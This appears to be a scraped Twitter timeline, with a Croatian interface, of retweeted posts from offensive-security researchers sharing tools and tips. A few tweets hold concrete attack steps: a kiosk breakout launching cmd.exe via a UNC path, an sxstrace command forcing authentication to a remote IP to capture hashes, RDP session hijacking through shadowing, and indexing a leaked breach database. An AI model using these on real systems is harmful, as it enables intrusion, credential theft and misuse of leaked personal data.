Tweetovi

Blokirali ste korisnika/cu @bik3te

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @bik3te

  1. proslijedio/la je Tweet
    4. velj

    As promised, here is the follow up defensive blog to last weeks post on Attacking Azure.

    Poništi
  2. proslijedio/la je Tweet
    4. velj
    Poništi
  3. proslijedio/la je Tweet
    3. velj

    I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful.

    Poništi
  4. proslijedio/la je Tweet
    1. velj

    I was tired of outdated XSS cheat sheets that don't touch on frameworks, html5, filter bypasses and other important stuff, so I made my own. I hope you find it as useful as I do. :)

    Poništi
  5. proslijedio/la je Tweet
    3. velj
    Poništi
  6. proslijedio/la je Tweet
    2. velj
    Poništi
  7. proslijedio/la je Tweet
    2. velj
    Poništi
  8. proslijedio/la je Tweet
    1. velj

    Indexing leaked database in ElasticSearch😍 Small example using data from the BreachCompilation and the dashboard you can come up with in Kibana🛠️

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    31. sij

    Very excited to announce and me will be bringing our training to Vegas this August for - we'll follow up soon with some revelations on what makes this course so exciting!

    Poništi
  10. proslijedio/la je Tweet
    29. sij

    Interviewé sur sur le profiling génomique et le social engineering à l'occasion de ma présentation au cc

    Poništi
  11. proslijedio/la je Tweet
    27. sij

    pwndrop - The new fast & fun way to set up an HTTP/WebDAV server for your payloads is coming! python -m SimpleHTTPServer may soon be retiring. Stay tuned! Here is a quick sneak peek:

    Poništi
  12. proslijedio/la je Tweet
    27. sij

    Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

    Poništi
  13. proslijedio/la je Tweet
    27. sij
    Poništi
  14. proslijedio/la je Tweet
    27. sij

    Using SharpRDP for lateral movement but blocked with a medium integrity process (UAC) 🛂 ? Well ... not a problem anymore ! 😁 Just updated SharpRDP with the option 'privileged' allowing you to run a process with High integrity (if your user is local admin) ! 🔥 1/3 ⬇️⬇️⬇️

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    27. sij

    , est prêt pour vous accueillir au !! Rendez-vous dès demain pour pleins de cyber-surprises 😉

    Poništi
  16. proslijedio/la je Tweet
    26. sij

    Some study notes on LSASS hooking for harvesting interactive logon credentials. Thanks to for his inspiring posts about mimikatz.

    Poništi
  17. proslijedio/la je Tweet
    25. sij

    If anyone is interested by an example of the Windows Next Generation Cryptography API (bcrypt.lib) - especially after CVE-2020-0601 - I wrote a simple C++ program that encrypt and decrypt a string. Link:

    Poništi
  18. proslijedio/la je Tweet
    24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

    Poništi
  19. proslijedio/la je Tweet
    24. sij
    Odgovor korisniku/ci
    Poništi
  20. proslijedio/la je Tweet
    24. sij

    Post-exploitation tip: Do you know how to trivially & remotely hijack an session without prompt nor warning on user's side using signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details:

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·